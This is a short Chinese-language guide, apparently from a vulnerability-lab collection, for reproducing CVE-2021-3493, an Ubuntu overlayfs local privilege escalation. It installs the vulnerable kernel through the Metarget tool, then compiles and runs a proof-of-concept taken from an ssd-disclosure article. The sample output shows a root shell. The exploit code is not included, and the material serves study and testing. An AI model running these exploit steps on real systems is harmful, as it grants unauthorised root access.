请参考ssd-disclosure的文章,下文的PoC来自同样来自这篇文章。
宿主机环境:
- Ubuntu 18.04
首先切换内核,直接通过Metarget安装环境
./metarget cnv install cve-2021-3493 --verbose
gcc -o poc poc.c
编译好poc.c,执行即可。例如:
ubuntu@test:~$ ls
poc.c
ubuntu@test:~$ gcc -o poc poc.c
ubuntu@test:~$ ./poc
bash-4.4# whoami
root